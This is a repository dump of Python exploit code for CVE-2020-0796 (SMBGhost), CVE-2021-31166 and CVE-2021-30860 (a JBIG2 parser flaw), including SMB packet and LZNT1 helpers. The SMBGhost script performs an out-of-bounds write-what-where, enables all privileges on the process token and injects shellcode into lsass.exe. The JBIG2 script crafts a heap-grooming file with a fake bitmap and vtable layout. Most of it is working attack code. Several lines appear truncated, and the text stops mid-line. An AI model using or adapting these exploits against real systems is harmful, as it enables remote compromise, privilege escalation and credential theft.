├── .gitignore ├── CVE-2020-0796 ├── exploit.py └── libs │ ├── lznt1.py │ └── smb.py ├── CVE-2021-30860 └── exploit.py ├── CVE-2021-31166 ├── README.md ├── exploit.py └── libs │ ├── lznt1.py │ └── smb.py ├── README.md └── libs └── win_lpe.py /.gitignore: -------------------------------------------------------------------------------- 1 | */private/ 2 | */.venv/ 3 | */.DS_Store 4 | */libs/__pycache__ 5 | 6 | libs/__pycache__ 7 | private/ 8 | .DS_Store -------------------------------------------------------------------------------- /CVE-2020-0796/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import os, socket, struct, sys 4 | from libs import lznt1, smb 5 | 6 | # import shared exploit libs 7 | sys.path.append(os.path.abspath(os.path.join('..'))) 8 | from libs import win_lpe as lpe 9 | 10 | def send(s, pkt): 11 | s.send(pkt) 12 | 13 | 14 | def recv(s): 15 | nb, = struct.unpack(">I", s.recv(4)) 16 | return s.recv(nb) 17 | 18 | 19 | def send_and_recv(s, pkt): 20 | s.send(pkt) 21 | return recv(s) 22 | 23 | 24 | def set_up_socket(ip, port=445, timeout=5): 25 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 26 | s.settimeout(timeout) 27 | s.connect((ip, port)) 28 | return s 29 | 30 | 31 | def get_what_where_LPE(): 32 | # explained in detail here: https://github.com/hatRiot/token-priv/blob/master/abusing_token_eop_1.0.txt 33 | 34 | # _TOKEN structure contains _SEP_TOKEN_PRIVILEGES at pToken + 0x40 35 | # ulonglong Present (pToken + 0x40) indicates which privileges exist 36 | # ulonglong Enabled (pToken + 0x48) indicates which privileges are enabled 37 | # ulonglong EnabledByDefault (pToken + 0x50) indicates initial state of the token 38 | 39 | addr = lpe.leak_process_token_addr() 40 | if not addr: exit(-1) 41 | # all privs exist, enabled, and enabled by default 42 | priv_bitmask = (0xFFFFFFFFFFFFFFFF >> 0x1E) << 2 43 | priv_bitmask = struct.pack(" 0x1100: 48 | print("Payload must be larger than 1 byte and smaller than 0x1100 bytes") 49 | exit(-1) 50 | 51 | # 0xffffffff + len(what) = len(what) - 1 52 | # SrvNetAlloocateBuffer of len(what) -1, this is not true allocation size though 53 | # compressed_data is decompressed and placed at buf + len("what") (OOB write) 54 | # "what" is copied to a pointer that we can control with the OOB write 55 | # for a write what where. 
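    # (annotation) minimal sketch of the 32-bit wrap described above, assuming
    # the 0xffffffff comes from the OriginalCompressedSegmentSize field and the
    # Offset field carries len(what), as in public CVE-2020-0796 write-ups:
    #   alloc_len = (0xFFFFFFFF + len(what)) & 0xFFFFFFFF   # == len(what) - 1
    # e.g. an 8-byte "what" requests only a 7-byte SrvNetAllocateBuffer allocation,
    # while the server still copies len(what) bytes and then decompresses past
    # them, giving the OOB write that lands on a controllable pointer.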
56 | 57 | # memory is allocated in pools, lowest size pool is 0x1100 58 | # overwrite padding + into header to change address for memcpy 59 | pad = b"A" * (0x1118 - len(what)) 60 | uncompressed_data = pad + struct.pack(" 2: 110 | print("Usage: exploit.py [IP]\nIf IP is omitted, LPE is attempted.") 111 | exit(-1) 112 | if len(sys.argv) == 2: 113 | ip = sys.argv[1] 114 | print(f"CVE-2020-0796 RCE payload => {ip}") 115 | exit() 116 | s = set_up_socket(ip) 117 | write_what_where(s, b"A" * 0x8, 0xDEADBEEFCAFEBABE) 118 | else: 119 | print(f"CVE-2020-0796 LPE payload") 120 | s = set_up_socket("127.0.0.1") 121 | what, where = get_what_where_LPE() 122 | write_what_where(s, what, where) 123 | victim_process = "lsass.exe" 124 | print("[+] Used write what where to modify token privileges") 125 | print(f"[+] injecting shellcode into {victim_process}") 126 | lpe.inject_shellcode_into_process(buf, victim_process) 127 | #lpe.trigger_printer_bug() 128 | #lpe.se_impersonate_privilege_and_printer_bug(shellcode) 129 | #os.system('cmd.exe') 130 | 131 | # useful windbg commands 132 | # .reload; bp srv2!Srv2DecompressData+0x108; g; r rcx; db rdx; g; gN; g; 133 | # .reload; bp srv2!Srv2DecompressData+0x108; g; r rcx; db rdx; 134 | # g; r rcx; db rdx; -------------------------------------------------------------------------------- /CVE-2020-0796/libs/lznt1.py: -------------------------------------------------------------------------------- 1 | 2 | import struct 3 | import sys 4 | import copy 5 | 6 | def _decompress_chunk(chunk): 7 | out = bytes() 8 | while chunk: 9 | flags = ord(chunk[0:1]) 10 | chunk = chunk[1:] 11 | for i in range(8): 12 | if not (flags >> i & 1): 13 | out += chunk[0:1] 14 | chunk = chunk[1:] 15 | else: 16 | flag = struct.unpack('= 0x10: 21 | l_mask >>= 1 22 | o_shift -= 1 23 | pos >>= 1 24 | 25 | length = (flag & l_mask) + 3 26 | offset = (flag >> o_shift) + 1 27 | 28 | if length >= offset: 29 | tmp = out[-offset:] * int(0xFFF / len(out[-offset:]) + 1) 30 | out += tmp[:length] 31 | else: 32 | out += out[-offset:-offset+length] 33 | chunk = chunk[2:] 34 | if len(chunk) == 0: 35 | break 36 | return out 37 | 38 | def decompress(buf, length_check=True): 39 | out = bytes() 40 | while buf: 41 | header = struct.unpack(' len(buf[2:]): 44 | raise ValueError('invalid chunk length') 45 | else: 46 | chunk = buf[2:2+length] 47 | if header & 0x8000: 48 | out += _decompress_chunk(chunk) 49 | else: 50 | out += chunk 51 | buf = buf[2+length:] 52 | 53 | return out 54 | 55 | def _find(src, target, max_len): 56 | result_offset = 0 57 | result_length = 0 58 | for i in range(1, max_len): 59 | offset = src.rfind(target[:i]) 60 | if offset == -1: 61 | break 62 | tmp_offset = len(src) - offset 63 | tmp_length = i 64 | if tmp_offset == tmp_length: 65 | tmp = src[offset:] * int(0xFFF / len(src[offset:]) + 1) 66 | for j in range(i, max_len+1): 67 | offset = tmp.rfind(target[:j]) 68 | if offset == -1: 69 | break 70 | tmp_length = j 71 | if tmp_length > result_length: 72 | result_offset = tmp_offset 73 | result_length = tmp_length 74 | 75 | if result_length < 3: 76 | return 0, 0 77 | return result_offset, result_length 78 | 79 | def _compress_chunk(chunk): 80 | blob = copy.copy(chunk) 81 | out = bytes() 82 | pow2 = 0x10 83 | l_mask3 = 0x1002 84 | o_shift = 12 85 | while len(blob) > 0: 86 | bits = 0 87 | tmp = bytes() 88 | for i in range(8): 89 | bits >>= 1 90 | while pow2 < (len(chunk) - len(blob)): 91 | pow2 <<= 1 92 | l_mask3 = (l_mask3 >> 1) + 1 93 | o_shift -= 1 94 | if len(blob) < l_mask3: 95 | max_len = len(blob) 96 | 
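            # (annotation) LZNT1 packs each copy token into 16 bits shared between
            # offset and length; as more of the chunk is consumed, o_shift drops and
            # l_mask3 shrinks (more offset bits, fewer length bits), so max_len is
            # capped by the remaining input or the longest match still encodable.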
else: 97 | max_len = l_mask3 98 | 99 | offset, length = _find(chunk[:len(chunk) - len(blob)], blob, max_len) 100 | 101 | # try to find more compressed pattern 102 | offset2, length2 = _find(chunk[:len(chunk) - len(blob)+1], blob[1:], max_len) 103 | if length < length2: 104 | length = 0 105 | 106 | if length > 0: 107 | symbol = ((offset-1) << o_shift) | (length - 3) 108 | tmp += struct.pack('> (7 - i)) 118 | out += tmp 119 | 120 | return out 121 | 122 | def compress(buf, chunk_size=0x1000): 123 | out = bytes() 124 | while buf: 125 | chunk = buf[:chunk_size] 126 | compressed = _compress_chunk(chunk) 127 | if len(compressed) < len(chunk): # chunk is compressed 128 | flags = 0xB000 129 | header = struct.pack('I",len(data)) 74 | self.data = data 75 | self.bytes = self.size + self.data 76 | 77 | def raw(self): 78 | return self.size + self.data 79 | 80 | 81 | class SMBSessionSetup: 82 | SECURITY_BLOB = b"\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x31\x90\x88\xe2" \ 83 | b"\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00" \ 84 | b"\x06\x01\xb1\x1d\x00\x00\x00\x0f" 85 | 86 | def __init__(self, flags, security_mode, capabilities, channel, blob_offset, 87 | blob_length, previous_session_id, security_blob): 88 | self.structure_size = b"\x19\x00" 89 | self.flags = flags 90 | self.security_mode = security_mode 91 | self.capabilities = capabilities 92 | self.channel = channel 93 | self.previous_session_id = previous_session_id 94 | self.blob_offset = blob_offset 95 | self.blob_length = blob_length 96 | self.security_blob = security_blob 97 | 98 | def raw(self): 99 | return self.structure_size + self.flags + self.security_mode + self.capabilities + \ 100 | self.channel + self.blob_offset + self.blob_length + self.previous_session_id + \ 101 | self.security_blob 102 | 103 | 104 | class SMBCompressionTransformHeader: 105 | def __init__(self, protocol_id, original_size, compression_algorithm, reserve, offset): 106 | self.protocol_id = protocol_id 107 | self.original_size = original_size 108 | self.compression_algorithm = compression_algorithm 109 | self.reserve = reserve 110 | self.offset = offset 111 | 112 | def raw(self): 113 | return self.protocol_id + self.original_size + self.compression_algorithm + \ 114 | self.reserve + self.offset 115 | 116 | 117 | ######################################## 118 | # Packet contructors 119 | ######################################## 120 | 121 | def CrashPacket(): 122 | # data is necessary for crash 123 | data = b'A' * 0xffff 124 | h = SMBCompressionTransformHeader( 125 | b"\xfc\x53\x4d\x42", # protocol_id 126 | struct.pack("I", self.seg_num) + \ 15 | struct.pack("B", self.seg_flags) + \ 16 | struct.pack("B", self.ref_flags) + \ 17 | struct.pack("B", self.page) + \ 18 | struct.pack(">I", self.seg_length) 19 | 20 | 21 | class segmentHeaderWithRefSegs: 22 | def __init__(self, seg_num, seg_flags, ref_flags, ref_segs, page, seg_length): 23 | self.seg_num = seg_num 24 | self.seg_flags = seg_flags 25 | self.ref_flags = ref_flags 26 | self.ref_segs = ref_segs 27 | self.page = page 28 | self.seg_length = seg_length 29 | 30 | def raw(self): 31 | return struct.pack(">I", self.seg_num) + \ 32 | struct.pack("B", self.seg_flags) + \ 33 | struct.pack("B", self.ref_flags) + \ 34 | self.ref_segs + \ 35 | struct.pack("B", self.page) + \ 36 | struct.pack(">I", self.seg_length) 37 | 38 | 39 | class segmentHeaderWithRefSegsLarge: 40 | def __init__(self, seg_num, seg_flags, ref_flags, ref_segs, page, seg_length): 41 | self.seg_num = seg_num 42 | self.seg_flags = seg_flags 
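        # (annotation) unlike segmentHeaderWithRefSegs above, this "large" variant
        # serializes ref_flags as a 4-byte big-endian field (see raw() below), so
        # callers pass 0xE0000000 | count for the long-form referred-to-segment
        # count, with the retain-bit padding and segment numbers packed in ref_segs.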
43 | self.ref_flags = ref_flags 44 | self.ref_segs = ref_segs 45 | self.page = page 46 | self.seg_length = seg_length 47 | 48 | def raw(self): 49 | return struct.pack(">I", self.seg_num) + \ 50 | struct.pack("B", self.seg_flags) + \ 51 | struct.pack(">I", self.ref_flags) + \ 52 | self.ref_segs + \ 53 | struct.pack("B", self.page) + \ 54 | struct.pack(">I", self.seg_length) 55 | 56 | 57 | class symbolDictionarySegment: 58 | def __init__(self, flags, sd_atx, sd_aty, num_ex_syms, num_new_syms, decoder_bytes): 59 | self.flags = flags 60 | self.sd_atx = sd_atx 61 | self.sd_aty = sd_aty 62 | self.num_ex_syms = num_ex_syms 63 | self.num_new_syms = num_new_syms 64 | self.decoder_bytes = decoder_bytes 65 | 66 | def raw(self): 67 | return struct.pack(">H", self.flags) + \ 68 | struct.pack("B", self.sd_atx[0]) + \ 69 | struct.pack("B", self.sd_aty[0]) + \ 70 | struct.pack("B", self.sd_atx[1]) + \ 71 | struct.pack("B", self.sd_aty[1]) + \ 72 | struct.pack("B", self.sd_atx[2]) + \ 73 | struct.pack("B", self.sd_aty[2]) + \ 74 | struct.pack("B", self.sd_atx[3]) + \ 75 | struct.pack("B", self.sd_aty[3]) + \ 76 | struct.pack(">I", self.num_ex_syms) + \ 77 | struct.pack(">I", self.num_new_syms) + \ 78 | self.decoder_bytes 79 | 80 | 81 | class refAggSymbolDictionarySegment: 82 | def __init__(self, flags, sd_atx, sd_aty, sdr_atx, sdr_aty, num_ex_syms, num_new_syms, decoder_bytes): 83 | self.flags = flags 84 | self.sd_atx = sd_atx 85 | self.sd_aty = sd_aty 86 | self.sdr_atx = sdr_atx 87 | self.sdr_aty = sdr_aty 88 | self.num_ex_syms = num_ex_syms 89 | self.num_new_syms = num_new_syms 90 | self.decoder_bytes = decoder_bytes 91 | 92 | def raw(self): 93 | return struct.pack(">H", self.flags) + \ 94 | struct.pack("B", self.sd_atx[0]) + \ 95 | struct.pack("B", self.sd_aty[0]) + \ 96 | struct.pack("B", self.sd_atx[1]) + \ 97 | struct.pack("B", self.sd_aty[1]) + \ 98 | struct.pack("B", self.sd_atx[2]) + \ 99 | struct.pack("B", self.sd_aty[2]) + \ 100 | struct.pack("B", self.sd_atx[3]) + \ 101 | struct.pack("B", self.sd_aty[3]) + \ 102 | struct.pack("B", self.sdr_atx[0]) + \ 103 | struct.pack("B", self.sdr_aty[0]) + \ 104 | struct.pack("B", self.sdr_atx[1]) + \ 105 | struct.pack("B", self.sdr_aty[1]) + \ 106 | struct.pack(">I", self.num_ex_syms) + \ 107 | struct.pack(">I", self.num_new_syms) + \ 108 | self.decoder_bytes 109 | 110 | 111 | 112 | 113 | class pageInfoSegment: 114 | def __init__(self, page_w, page_h, x_res, y_res, flags, striping): 115 | self.page_w = page_w 116 | self.page_h = page_h 117 | self.x_res = x_res 118 | self.y_res = y_res 119 | self.flags = flags 120 | self.striping = striping 121 | 122 | def raw(self): 123 | return struct.pack(">I", self.page_w) + \ 124 | struct.pack(">I", self.page_h) + \ 125 | struct.pack(">I", self.x_res) + \ 126 | struct.pack(">I", self.y_res) + \ 127 | struct.pack("B", self.flags) + \ 128 | struct.pack(">H", self.striping) 129 | 130 | 131 | class textRegionSegment: 132 | def __init__(self, w, h, x, y, seg_info_flags, flags, num_instances, decoder_bytes): 133 | self.w = w 134 | self.h = h 135 | self.x = x 136 | self.y = y 137 | self.seg_info_flags = seg_info_flags 138 | self.flags = flags 139 | self.num_instances = num_instances 140 | self.decoder_bytes = decoder_bytes 141 | 142 | def raw(self): 143 | return struct.pack(">I", self.w) + \ 144 | struct.pack(">I", self.h) + \ 145 | struct.pack(">I", self.x) + \ 146 | struct.pack(">I", self.y) + \ 147 | struct.pack("B", self.seg_info_flags) + \ 148 | struct.pack(">H", self.flags) + \ 149 | struct.pack(">I", self.num_instances) 
+ \ 150 | self.decoder_bytes 151 | 152 | 153 | class genericRefinementRegionSegment: 154 | def __init__(self, w, h, x, y, seg_info_flags, flags, sd_atx, sd_aty, decoder_bytes): 155 | self.w = w 156 | self.h = h 157 | self.x = x 158 | self.y = y 159 | self.seg_info_flags = seg_info_flags 160 | self.flags = flags 161 | self.sd_atx = sd_atx 162 | self.sd_aty = sd_aty 163 | self.decoder_bytes = decoder_bytes 164 | 165 | def raw(self): 166 | if self.flags & 1 == 1: 167 | # templ on, atx/aty not read 168 | return struct.pack(">I", self.w) + \ 169 | struct.pack(">I", self.h) + \ 170 | struct.pack(">I", self.x) + \ 171 | struct.pack(">I", self.y) + \ 172 | struct.pack("B", self.seg_info_flags) + \ 173 | struct.pack("B", self.flags) + \ 174 | self.decoder_bytes 175 | else: 176 | return struct.pack(">I", self.w) + \ 177 | struct.pack(">I", self.h) + \ 178 | struct.pack(">I", self.x) + \ 179 | struct.pack(">I", self.y) + \ 180 | struct.pack("B", self.seg_info_flags) + \ 181 | struct.pack("B", self.flags) + \ 182 | struct.pack("B", self.sd_atx[0]) + \ 183 | struct.pack("B", self.sd_aty[0]) + \ 184 | struct.pack("B", self.sd_atx[1]) + \ 185 | struct.pack("B", self.sd_aty[1]) + \ 186 | self.decoder_bytes 187 | 188 | 189 | def or_bytes_at_offset(f, bytez, offset): 190 | bits = 0 191 | for byte in bytez: 192 | for bit in format(byte, "08b"): 193 | # encode 1 bit 194 | data_bytes = b"\xff\x7f\xff\xac" 195 | if bit == "0": 196 | # encode 0 bit 197 | data_bytes = b"\x7f\xff\xac" 198 | # w, h, x, y, seg_info_flags, flags, sd_atx, sd_aty, decoder_bytes 199 | grrs = genericRefinementRegionSegment(0x1, 0x1, (offset << 3) + bits, 0, OR, 0, [0,0], [0,0], data_bytes) 200 | grrs_sh = segmentHeader(0xffffffff, 0x2A, 0, 1, len(grrs.raw())) 201 | f.write(grrs_sh.raw() + grrs.raw()) 202 | bits += 1 203 | 204 | 205 | def and_bytes_at_offset(f, bytez, offset): 206 | bits = 0 207 | for byte in bytez: 208 | for bit in format(byte, "08b"): 209 | # encode 1 bit 210 | data_bytes = b"\xff\x7f\xff\xac" 211 | if bit == "0": 212 | # encode 0 bit 213 | data_bytes = b"\x7f\xff\xac" 214 | 215 | grrs = genericRefinementRegionSegment(0x1, 0x1, (offset << 3) + bits, 0, AND, 0, [0,0], [0,0], data_bytes) 216 | grrs_sh = segmentHeader(0xffffffff, 0x2A, 0, 1, len(grrs.raw())) 217 | f.write(grrs_sh.raw() + grrs.raw()) 218 | bits += 1 219 | 220 | 221 | def replace_bytes_at_offset(f, bytez, offset): 222 | bits = 0 223 | for byte in bytez: 224 | for bit in format(byte, "08b"): 225 | # encode 1 bit 226 | data_bytes = b"\xff\x7f\xff\xac" 227 | if bit == "0": 228 | # encode 0 bit 229 | data_bytes = b"\x7f\xff\xac" 230 | 231 | grrs = genericRefinementRegionSegment(0x1, 0x1, (offset << 3) + bits, 0, REPLACE, 0, [0,0], [0,0], data_bytes) 232 | grrs_sh = segmentHeader(0xffffffff, 0x2A, 0, 1, len(grrs.raw())) 233 | f.write(grrs_sh.raw() + grrs.raw()) 234 | bits += 1 235 | 236 | # offsets 237 | data_buffer_to_segments = 0x3B0 238 | data_buffer_to_bitmap = 0x4b0 239 | data_buffer_to_known_good_bitmap = 0x4d0 240 | data_buffer_to_bitmap_w = data_buffer_to_bitmap + 0x8 + 0x4 241 | data_buffer_to_bitmap_h = data_buffer_to_bitmap + 0x8 + 0x8 242 | data_buffer_to_bitmap_line = data_buffer_to_bitmap + 0x8 + 0xc 243 | data_buffer_to_bitmap_data = data_buffer_to_bitmap + 0x8 + 0x10 244 | data_buffer_to_known_good_sds = 0x6c0 245 | 246 | spoofed_bitmap_segnum = 0x8 247 | spoofed_bitmap_w = 0xc 248 | spoofed_bitmap_h = 0x10 249 | spoofed_bitmap_line = 0x14 250 | spoofed_bitmap_data = 0x18 251 | 252 | spoofed_vtable = 0x68 253 | 254 | spoofed_sds = 0x48 255 | 
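# (annotation) the spoofed_* values above and below are byte offsets into the
# groomed data buffer where a fake bitmap, fake symbol dictionary, fake vtable
# pointer and saved register values are assembled one bit at a time by the
# refinement-segment primitives (or/and/replace_bytes_at_offset) defined above.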
spoofed_sds_segnum = spoofed_sds + 0x8 256 | spoofed_sds_size = spoofed_sds + 0xc 257 | spoofed_sds_bitmaps = spoofed_sds + 0x10 258 | 259 | spoofed_sds_bitmaps_pointer = 0x60 260 | 261 | flags = 0x20 262 | rax = 0x28 263 | rbx = 0x30 264 | rcx = 0x38 265 | rdx = 0x40 266 | 267 | rax_high = 0x2c 268 | rbx_high = 0x34 269 | rcx_high = 0x3c 270 | rdx_high = 0x44 271 | 272 | eax = 0x28 273 | ebx = 0x30 274 | ecx = 0x38 275 | edx = 0x40 276 | 277 | 278 | # bitwise operations 279 | OR = 0 280 | AND = 1 281 | XOR = 2 282 | XNOR = 3 283 | REPLACE = 4 284 | 285 | # segment list operations in readGenericReginementSeg 286 | COMBINE = 0x2a 287 | STORE = 0x28 288 | 289 | # bit to write when discarding, don't care about its value 290 | garbage_bit = (0x27 << 3) + 7 291 | sum_half_adder_bit = (0x20 << 3) 292 | carry_bit = (0x20 << 3) + 1 293 | carry_half_adder_bit = (0x20 << 3) + 2 294 | 295 | """ 296 | Fake JBIG2Bitmap: red 297 | EFLAGS: blue 298 | RAX: purple 299 | RBX: green 300 | RCX: pink 301 | RDX: orange 302 | 303 | registers 304 | 305 | General registers 306 | EAX EBX ECX EDX 307 | 308 | Segment registers 309 | CS DS ES FS GS SS 310 | 311 | Index and pointers 312 | ESI EDI EBP EIP ESP 313 | 314 | Indicator 315 | EFLAGS 316 | 317 | EFLAGS: 318 | Bit Label Desciption 319 | --------------------------- 320 | 0 CF Carry flag 321 | 2 PF Parity flag 322 | 4 AF Auxiliary carry flag 323 | 6 ZF Zero flag 324 | 7 SF Sign flag 325 | 8 TF Trap flag 326 | 9 IF Interrupt enable flag 327 | 10 DF Direction flag 328 | 11 OF Overflow flag 329 | 12-13 IOPL I/O Priviledge level 330 | 14 NT Nested task flag 331 | 16 RF Resume flag 332 | 17 VM Virtual 8086 mode flag 333 | 18 AC Alignment check flag (486+) 334 | 19 VIF Virutal interrupt flag 335 | 20 VIP Virtual interrupt pending flag 336 | 21 ID ID flag 337 | """ 338 | 339 | debug_sh = segmentHeader(0xffffffff, 0x34, 0, 1, 0) 340 | final_debug_sh = segmentHeader(0xffffffff, 0x3E, 0, 1, 0) 341 | toggle_debug_sh = segmentHeader(0xffffffff, 0x32, 0, 1, 0) 342 | 343 | 344 | 345 | def unbound_page(f): 346 | # needed to appease some sanity check, swap out the page anyway later 347 | pis = pageInfoSegment(1, 1, 0, 0, 0, 0) 348 | pis_sh = segmentHeader(0xffffffff, 0x30, 0, 1, len(pis.raw())) 349 | f.write(pis_sh.raw() + pis.raw()) 350 | 351 | # dictionary seg 352 | mal_sds = symbolDictionarySegment( 353 | 0, 354 | [0x03,0xFD,0x02,0xFE], 355 | [0xFF,0xFF,0xFE,0xFE], 356 | 0xFFFF, 357 | 0xFFFF, 358 | b"\x94\x4f\x06\x7b\xff\x7f\xff\x7f\xff\x7f\xff\x7d\xd3\x26\xa8\x9d\x6c\xb0\xee\x7f\xff\xac" 359 | ) 360 | mal_sds_sh = segmentHeader(1, 0, 1, 0, len(mal_sds.raw())) 361 | f.write(mal_sds_sh.raw() + mal_sds.raw()) 362 | 363 | # force 1Q mallocs to eat up all the free space 364 | for i in range(1, 0x10000): 365 | pis = pageInfoSegment(0x71, 1, 0, 0, 0, 0) 366 | pis_sh = segmentHeader(0xffffffff, 0x30, 0, 1, len(pis.raw())) 367 | f.write(pis_sh.raw() + pis.raw()) 368 | 369 | # set up segments Glist for resizing (reallocation) 370 | for i in range(0, 0xF): 371 | sds = symbolDictionarySegment(0, [0x03,0xFD,0x02,0xFE], [0xFF,0xFF,0xFE,0xFE], 1, 1, b"\x93\xFC\x7F\xFF\xAC") 372 | sds_sh = segmentHeader(2, 0, 1, 0, len(sds.raw())) 373 | f.write(sds_sh.raw() + sds.raw()) 374 | 375 | # allocate 0x80, 0x80, and 0x40 in that order 376 | sds = symbolDictionarySegment(0, 377 | [0x03,0xFD,0x02,0xFE], 378 | [0xFF,0xFF,0xFE,0xFE], 379 | 3, 380 | 3, 381 | b"\x13\xb0\xb7\xcf\x36\xb1\x68\xbf\xff\xac") 382 | sds_sh = segmentHeader(3, 0, 1, 0, len(sds.raw())) 383 | f.write(sds_sh.raw() + sds.raw()) 384 | 
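    # (annotation) rough intent of the grooming so far, per the comments above: the
    # page-info spam consumes the small free blocks, the 0xF dictionary segments
    # force the segments GList to reallocate predictably, and the 0x80/0x80/0x40
    # dictionary allocations shape the allocator so the 0x80 page buffer allocated
    # below is reclaimed from a predictable free block before the vuln is triggered.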
385 | # consume some freed blocks 386 | for i in range(0, 1): 387 | pis = pageInfoSegment(0x71, 1, 0, 0, 0, 0) 388 | pis_sh = segmentHeader(0xffffffff, 0x30, 0, 1, len(pis.raw())) 389 | f.write(pis_sh.raw() + pis.raw()) 390 | 391 | # allocate page that will be exploited 392 | # 0x3F1 results in a malloc of 0x80 for the buffer, should reclaim from cache 393 | pis = pageInfoSegment(0x3F1, 1, 0, 0, 0, 0) 394 | pis_sh = segmentHeader(4, 0x30, 0, 1, len(pis.raw())) 395 | f.write(pis_sh.raw() + pis.raw()) 396 | 397 | # trigger the vuln and create a bitmap directly after triggering, will steal vtable for arbitrary read 398 | trs = textRegionSegment(1, 1, 0, 0, 0, 0, 1, b"\xA9\x43\xFF\xAC") 399 | ref_seg_bytes = (b"\xff" * 0x2D) + (b"\x02" * 0xFFD2) + (0x10000 * b"\x01") + (b"\x02" * 1) + (b"\x02" * 0x2) 400 | pad = ((len(ref_seg_bytes) + 9) >> 3) * b"\x00" 401 | trs_sh = segmentHeaderWithRefSegsLarge(5, 402 | 0x4, 403 | 0xE0000000 + len(ref_seg_bytes), 404 | pad + ref_seg_bytes, 405 | 1, 406 | len(trs.raw()) 407 | ) 408 | f.write(trs_sh.raw() + trs.raw()) 409 | 410 | """ 411 | # testing, hope is to allocate an sds predictably for further faking 412 | # store segment of size 1 to increment syms buffer size granularly 413 | sds = symbolDictionarySegment(0, [0x03,0xFD,0x02,0xFE], [0xFF,0xFF,0xFE,0xFE], 1, 1, b"\x93\xFC\x7F\xFF\xAC") 414 | sds_sh = segmentHeader(0x9999, 0, 1, 0, len(sds.raw())) 415 | f.write(sds_sh.raw() + sds.raw()) 416 | """ 417 | #f.write(debug_sh.raw()) 418 | # end testing 419 | 420 | # fail a sanity check but set pageW and pageH to large values so subsequent reads will work 421 | pis = pageInfoSegment(0xffffffff, 0xfffffffe, 0, 0, 0, 0) 422 | pis_sh = segmentHeader(0xffffffff, 0x30, 0, 1, len(pis.raw())) 423 | f.write(pis_sh.raw() + pis.raw()) 424 | 425 | # overwrite pageBitmaps values to fully unbound operations 426 | # line is overwritten with -1 for now 427 | or_bytes_at_offset(f, struct.pack("I", 0xBADDAD), 1, len(grrs.raw())) 440 | f.write(grrs_sh.raw() + grrs.raw()) 441 | 442 | 443 | def op_from_offset_to_offset(f, num_bits, read_bit_offset, write_bit_offset, op): 444 | for i in range(num_bits): 445 | grrs = genericRefinementRegionSegment(0x1, 0x1, read_bit_offset + i, 0, 0, 2, [0,0], [0,0], b"\xff\x7f\xff\xac") 446 | grrs_sh = segmentHeader(0xBADDAD, STORE, 0, 1, len(grrs.raw())) 447 | f.write(grrs_sh.raw() + grrs.raw()) 448 | grrs = genericRefinementRegionSegment(0x1, 0x1, write_bit_offset + i, 0, op, 2, [0,0], [0,0], b"\xff\x7f\xff\xac") 449 | grrs_sh = segmentHeaderWithRefSegsLarge(0xffffffff, COMBINE, 0xE0000001, b"\x00" + struct.pack(">I", 0xBADDAD), 1, len(grrs.raw())) 450 | f.write(grrs_sh.raw() + grrs.raw()) 451 | 452 | 453 | def discard_segment(f, seg_num): 454 | grrs = genericRefinementRegionSegment(0x1, 0x1, garbage_bit, 0, REPLACE, 2, [0,0], [0,0], b"\xff\x7f\xff\xac") 455 | grrs_sh = segmentHeaderWithRefSegsLarge(0xffffffff, COMBINE, 0xE0000001, b"\x00" + struct.pack(">I", seg_num), 1, len(grrs.raw())) 456 | f.write(grrs_sh.raw() + grrs.raw()) 457 | 458 | 459 | def flush_overflow_segments(f): 460 | for i in range(0, 0x11): 461 | # swap in 0x11 placeholders 462 | grrs = genericRefinementRegionSegment(0x1, 0x1, garbage_bit, 0, 0, 0, [0,0], [0,0], b"\x7f\xff\xac") 463 | grrs_sh = segmentHeader(0xc0ffee, STORE, 0, 1, len(grrs.raw())) 464 | f.write(grrs_sh.raw() + grrs.raw()) 465 | 466 | grrs = genericRefinementRegionSegment(0x1, 0x1, garbage_bit, 0, AND, 2, [0,0], [0,0], b"\x7f\xff\xac") 467 | grrs_sh = segmentHeaderWithRefSegsLarge(0xffffffff, COMBINE, 
0xE0000001, b"\x00" + struct.pack(">I", 0x0), 1, len(grrs.raw())) 468 | f.write(grrs_sh.raw() + grrs.raw()) 469 | 470 | for i in range(0x11, 0x1f): 471 | # fill the rest of the list with placeholders 472 | grrs = genericRefinementRegionSegment(0x1, 0x1, garbage_bit, 0, 0, 0, [0,0], [0,0], b"\x7f\xff\xac") 473 | grrs_sh = segmentHeader(0xc0ffee, STORE, 0, 1, len(grrs.raw())) 474 | f.write(grrs_sh.raw() + grrs.raw()) 475 | # list is now 0x1f long, one segment left to do offset reads 476 | 477 | 478 | def read_bit_from_calculated_offset_to_offset(f, write_byte_offset, write_bit_offset): 479 | # list is now set up for rotating reads. 0x1f segments switched in 480 | # last pointer overwritten by every segment read, last bit is 0 because 481 | # of byte alignment, so not all 32 bits are needed. upper 32 bits don't 482 | # have to be changed 483 | 484 | for i in range(0, 0x1f): 485 | # consume placeholders, store bits of buffer address 486 | grrs = genericRefinementRegionSegment(0x1, 0x1, garbage_bit, 0, REPLACE, 2, [0,0], [0,0], b"\x7f\xff\xac") 487 | grrs_sh = segmentHeaderWithRefSegsLarge(0xffffffff, COMBINE, 0xE0000001, b"\x00" + struct.pack(">I", 0xc0ffee), 1, len(grrs.raw())) 488 | f.write(grrs_sh.raw() + grrs.raw()) 489 | 490 | grrs = genericRefinementRegionSegment(0x1, 0x1, ((data_buffer_to_bitmap_data + 3 - (i // 8)) << 3) + (i % 8), 0, 0, 2, [0,0], [0,0], b"\xff\x7f\xff\xac") 491 | grrs_sh = segmentHeader(0xcafe + i, STORE, 0, 1, len(grrs.raw())) 492 | f.write(grrs_sh.raw() + grrs.raw()) 493 | 494 | # append segment (brings list up to 0x20), will overwrite this pointer in the segment list 495 | grrs = genericRefinementRegionSegment(0x1, 0x1, garbage_bit, 0, 0, 0, [0,0], [0,0], b"\xff\x7f\xff\xac") 496 | grrs_sh = segmentHeader(0xc0ffee, STORE, 0, 1, len(grrs.raw())) 497 | f.write(grrs_sh.raw() + grrs.raw()) 498 | 499 | for i in range(0, 0x1f): 500 | # write buffer address into list 501 | grrs = genericRefinementRegionSegment(0x1, 0x1, (((data_buffer_to_segments + (0x8 * (0x1f - i))) + 0x3 - (i // 8) ) << 3) + (i % 8), 0, REPLACE, 2, [0,0], [0,0], b"\xff\x7f\xff\xac") 502 | #grrs = genericRefinementRegionSegment(0x1, 0x1, ((data_buffer_to_segments + (0x8 * (0x1f - i))) << 3) + i, 0, REPLACE, 2, [0,0], [0,0], b"\xff\x7f\xff\xac") 503 | grrs_sh = 